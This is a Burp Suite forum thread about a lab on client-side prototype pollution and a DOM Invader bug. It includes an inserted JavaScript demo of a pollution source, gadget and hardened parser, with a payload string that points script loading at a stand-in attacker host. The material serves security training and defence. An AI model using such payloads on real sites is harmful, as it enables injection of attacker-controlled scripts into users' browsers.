Burp Suite User Forum


LAB Client-side prototype pollution in third-party libraries

Luca | Last updated: Apr 19, 2023 12:01AM UTC

Hi, can anybody double-check that DOM Invader is able to find a gadget for this one? I followed the solution steps and it doesn't seem to find the gadget as mentioned. Thank you
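The source-and-gadget pattern this lab is about, as an added illustration that is not the lab's code, DOM Invader, or the third-party library the lab uses. Everything here is constructed: the hash parser as the pollution source, the `transport_url` property, the `buildScriptSrc` gadget and the payload string are all assumptions chosen to show the mechanism, with a hardened writer beside the vulnerable one.

```javascript
// Constructed example: a client-side prototype pollution source (URL hash
// parsed into nested keys) and a library-style gadget that consumes the
// polluted property. Not the lab's code or its third-party library.

// Source: turn "#a.b=1&c=2" into {a:{b:"1"},c:"2"} (constructed parser).
// The writer used to store each key is pluggable so the vulnerable and
// hardened variants share the same parsing loop.
function parseHash(hash, writer = setPath) {
  const out = {};
  for (const pair of hash.replace(/^#/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const val = decodeURIComponent(eq === -1 ? '' : pair.slice(eq + 1));
    writer(out, key.split('.'), val);
  }
  return out;
}

// Vulnerable writer: never rejects __proto__, so the path
// ["__proto__", "transport_url"] lands on Object.prototype.
function setPath(obj, path, value) {
  let cur = obj;
  for (let i = 0; i < path.length - 1; i++) {
    const k = path[i];
    if (typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
    cur = cur[k]; // for "__proto__" this is Object.prototype itself
  }
  cur[path[path.length - 1]] = value;
}

// Gadget: reads an optional setting the page never defines. On a clean
// prototype the lookup yields undefined; after pollution it finds the
// attacker's value on the prototype chain and builds a URL that a real
// page would hand to a script element (constructed sink, no DOM here).
function buildScriptSrc(config) {
  const transport = config.transport_url;
  return transport === undefined ? null : transport + '/script.js';
}

// Check to run in the browser console after delivering a payload:
// has a property of this name been written onto Object.prototype itself?
function isPolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Hardened writer: refuse any path segment that can reach a prototype and
// only descend into own properties of the object being built.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function setPathSafe(obj, path, value) {
  if (path.some((k) => FORBIDDEN.has(k))) return;
  let cur = obj;
  for (let i = 0; i < path.length - 1; i++) {
    const k = path[i];
    if (!Object.prototype.hasOwnProperty.call(cur, k) ||
        typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
    cur = cur[k];
  }
  cur[path[path.length - 1]] = value;
}
function parseHashSafe(hash) { return parseHash(hash, setPathSafe); }

// Walk through source -> pollution -> gadget -> cleanup -> hardened source.
// The delete is essential: a polluted prototype persists for the lifetime
// of the page (or this process), which is why re-running a check without a
// reload can mislead you.
function demo() {
  const payload = '#__proto__.transport_url=//attacker.example'; // constructed
  const before = buildScriptSrc({});        // null: nothing on the prototype yet
  parseHash(payload);                        // vulnerable source runs
  const polluted = isPolluted('transport_url');
  const after = buildScriptSrc({});         // gadget now consumes attacker value
  delete Object.prototype.transport_url;    // undo the pollution
  parseHashSafe(payload);                   // hardened source drops the key
  const hardened = buildScriptSrc({});      // null again
  return { before, polluted, after, hardened };
}

console.log(JSON.stringify(demo()));
```

Run it with `node`; the `isPolluted` helper is the one-liner worth keeping for manual verification, since a gadget that fires on the exploit server but not on the target page usually means the property never reached `Object.prototype` in that second context.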

Luca | Last updated: Apr 19, 2023 12:35AM UTC

I'm also wondering why the payload works when clicking on "view exploit" in the exploit server, but not if I copy and paste it manually on the home page...

Luca | Last updated: Apr 20, 2023 08:41AM UTC

Ping... can anybody from Portswigger check this please?

Ben, PortSwigger Agent | Last updated: Apr 20, 2023 08:47AM UTC

Hi Luca, we will take a look at this particular lab and get back to you in due course.

Ben, PortSwigger Agent | Last updated: Apr 20, 2023 04:33PM UTC

Hi Luca, I can replicate the behaviour you are seeing - we are currently investigating why this is happening. I will update this forum thread when I find out some more information.

Luca | Last updated: Apr 24, 2023 09:53PM UTC

Fortunately I have this page still open... for some reason it does not show up in a search :)

unkown | Last updated: Apr 28, 2023 10:24AM UTC

I saw this bug a week ago.

Ben, PortSwigger Agent | Last updated: May 03, 2023 12:51PM UTC

Hi all, having discussed this with the team, we think this is a bug in DOM Invader related to some of the patches being applied to Chrome. We are going to have to work on a fix to get this resolved, so will update this forum thread when we believe it has been fixed.

Luke | Last updated: Mar 04, 2024 09:41AM UTC

Hi, I just want to know what the status is for this. I can get my payload to trigger when I view the exploit, but no "Solved" when delivering to the victim.

Ben, PortSwigger Agent | Last updated: Mar 04, 2024 10:53AM UTC

Hi Luke, Apologies, it looks like this thread was not updated at the time. Essentially the issue with DOM Invader was fixed shortly after this issue was reported. I have just run through this particular lab and been able to solve it using the solution provided so it does appear to be working. What does the exploit you are trying to use look like?
